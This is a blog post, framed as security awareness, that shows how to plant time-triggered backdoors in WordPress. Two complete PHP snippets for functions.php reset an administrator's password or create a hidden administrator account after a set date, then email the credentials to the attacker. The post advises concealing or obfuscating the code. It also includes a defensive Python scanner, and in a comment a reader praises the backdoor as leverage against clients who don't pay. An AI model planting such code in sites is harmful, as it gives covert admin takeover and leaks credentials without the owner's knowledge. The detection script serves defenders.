Creating a backdoor in WordPress

This is the first post in my WordPress Evil series, in which I will demonstrate how a backdoor can be created in WordPress. The idea for this post came from a question on WordPress Answers where someone asked: Is there a security risk in giving someone temporary access to my blog's code?

Example #1

Change the admin password after a certain date or time and inform us! Sounds good?

<?php
if ( strtotime( "2011-04-30" ) < time() ) {

    $target_admin_id = 1; // change this if the admin has a different ID or you want to target a particular admin
    $target_admin_new_password = 'evilme';
    $target_admin_userinfo = get_userdata( $target_admin_id );

    if ( !wp_check_password( $target_admin_new_password, $target_admin_userinfo->user_pass , $target_admin_id ) ) { // Have we already changed the password?

        add_action( 'shutdown', 'evilme_change_admin_password' );

        function evilme_change_admin_password() {

            global $target_admin_id;
            global $target_admin_new_password;
            global $target_admin_userinfo;

            wp_set_password( $target_admin_new_password, $target_admin_id );

            // now email me that the admin account's password has been changed

            wp_mail( 'ashishsainiashfame@gmail.com', 'Admin password has been changed!', 'WP URL - '.get_bloginfo( 'wpurl' ).' | username: '.$target_admin_userinfo->user_login.' | password: '.$target_admin_new_password );
        }
    }
}

?>

At the very beginning, I check whether the current time is past April 30, 2011, and only then execute the rest of the code. Change it to the date on which you want the backdoor to be created. The basic logic is to set a user's password using wp_set_password() and to check first whether the password has already been changed, so that the database write and the alert email do not happen on every page load.

I have attached it to the shutdown hook so that it does not interfere with the page output while it runs. Change the email address and the new password you want to set, and try this on a demo WordPress install by pasting the code into the functions.php file.

Example #2

Create a new admin user after a certain date or time and ping us when ready!

<?php
if ( strtotime( "2011-04-30" ) < time() ) {

    // Required for username_exists()
    require_once( ABSPATH . WPINC . '/registration.php' );

    if ( !username_exists( 'ashfame-evil' ) ) { // Have we already done it once?

        add_action( 'shutdown', 'evilme_create_new_admin' );

        function evilme_create_new_admin() {

            $user_id = wp_insert_user( array(
                'user_login' => 'ashfame-evil',
                'user_pass'  => 'evilme',
                'user_email' => 'ashishsainiashfame@hotmail.com',
                'role'       => 'administrator'
            ) );

            // now email me that my new admin account is ready

            wp_mail( 'ashishsainiashfame@gmail.com', 'New Admin account is ready', 'WP - '.get_bloginfo( 'wpurl' ).' | username: ashfame-evil | password: evilme' );
        }
    }
}

?>

Again I check the date, and if the condition is satisfied, I use wp_insert_user() to create a new administrator user. To make sure the code only does this once, I check whether the username I want to create already exists. If it does, we have already created the new admin user and you should have received an email about it. You can test this too by changing the email address and putting the code in your functions.php file.

Ideally you wouldn't keep this code easily visible; it can be hidden anywhere: deep inside the functions.php file, in some custom plugin, or even obfuscated.
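Since the code can sit anywhere in the theme or plugin tree, a site owner's practical check is to scan that tree for the combination this post relies on: a date-gated condition, a shutdown-hook callback, and a call that sets a password or inserts an administrator. The scanner below is an added example, not part of the original post; the indicator list, weights and threshold are assumptions to tune, and the embedded functions.php is a constructed, stripped-down copy of Example #2 with no real credentials.

```python
import re
from pathlib import Path

# Indicators drawn from the two examples in this post. Weights and the
# alert threshold are assumptions; adjust them for your own code base.
INDICATORS = {
    "time_gate":     (re.compile(r"strtotime\s*\(\s*['\"][^'\"]+['\"]\s*\)\s*<\s*time\s*\(\s*\)"), 3),
    "set_password":  (re.compile(r"\bwp_set_password\s*\("), 3),
    "insert_user":   (re.compile(r"\bwp_insert_user\s*\("), 2),
    "admin_role":    (re.compile(r"['\"]role['\"]\s*=>\s*['\"]administrator['\"]"), 3),
    "shutdown_hook": (re.compile(r"add_action\s*\(\s*['\"]shutdown['\"]"), 1),
    "mail_out":      (re.compile(r"\bwp_mail\s*\("), 1),
    # obfuscation hints, since the post notes the code may be obfuscated
    "obfuscation":   (re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\("), 2),
}
ALERT_THRESHOLD = 5  # assumption: a single wp_mail() or shutdown hook alone is normal


def scan_source(php_source: str) -> dict:
    """Return {indicator_name: hit_count} for one PHP source string."""
    hits = {}
    for name, (pattern, _weight) in INDICATORS.items():
        count = len(pattern.findall(php_source))
        if count:
            hits[name] = count
    return hits


def score(hits: dict) -> int:
    """Weighted score: each distinct indicator counts once."""
    return sum(INDICATORS[name][1] for name in hits)


def scan_tree(root: Path) -> list:
    """Walk a wp-content tree; return (path, score, hits) for files over the threshold."""
    findings = []
    for path in root.rglob("*.php"):
        hits = scan_source(path.read_text(errors="replace"))
        total = score(hits)
        if total >= ALERT_THRESHOLD:
            findings.append((str(path), total, hits))
    return sorted(findings, key=lambda finding: -finding[1])


# Constructed sample: the post's Example #2 reduced to its skeleton and buried
# after a harmless theme helper, the way the post says it could be hidden.
SAMPLE_FUNCTIONS_PHP = """<?php
function theme_excerpt_length( $len ) { return 30; }
add_filter( 'excerpt_length', 'theme_excerpt_length' );
if ( strtotime( "2011-04-30" ) < time() ) {
    add_action( 'shutdown', 'x' );
    function x() { wp_insert_user( array( 'role' => 'administrator' ) ); wp_mail( 'a@b', 's', 'm' ); }
}
"""
```

Run scan_tree(Path("wp-content")) against a copy of the site to list files worth reading by hand; a hit is a reason to look, not proof of a backdoor.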

This tutorial was solely for fun and for making people aware that it is not safe to provide temporary access to your blog. If someone did what I just demonstrated, everything would look fine and there would be nothing for you to notice, but once the timer expires, it creates a backdoor. A more subtle implementation would create an administrator account at a certain time and then delete that user an hour later, every day or week. The user IDs would keep going up, which might raise suspicion after quite some time, but the possibilities are endless. Be smart, be aware, spread the word about it. Friends don't let friends fall for others' trap.

If you have any questions about the code here, feel free to shoot me a question in the comments. And don't forget to share this post on Facebook & Tweet it!

Subscribe to feeds so as not to miss any of the evil posts! ;)

Published by

Ashfame

Developer + Entrepreneur + Opensource fanatic. Love WordPress + Startups + Music + Adrenaline kick.

  • Joe

    From your comment above – “Be smart, be aware, spread the word about it. Friends don’t let friends fall for others’ trap.”

    OKAY? Now how do I go about making sure the freelancer who did work for us did not leave evil code and a back door in my WP installation?

    Joe

    • http://www.ashfame.com/ Ashfame

      There is really no way other than checking the code. It can be anywhere in the whole WordPress installation. We are just talking about feasibility. If you hire someone to do the work, make sure the guy is not a random freelancer or some shady character, else he might put this in the code first and turn evil after some disagreement between you and him. Always hire a good developer to do the job.

      The whole post was an idea to demonstrate that if you give someone access to the code once, they can get back on it afterwards.

      Tip – Open source guys are preferable, as they are really not after money and are actually the guys who can do it but won’t do it.

    • http://www.ashfame.com/ Ashfame

      Oh and by that comment, I meant sharing this post with other fellow publishers so that they are aware of it. Facebook / Twitter or any other. :)

  • http://viptabloid.com/ukraine.html Ukraine

    Does it run on WordPress higher than 3?

  • http://www.ineed.ws/en/our_work/cat/wordpress/ ineed

    It’s a nice tool to use when your customer forgets to pay for a project :) thanks!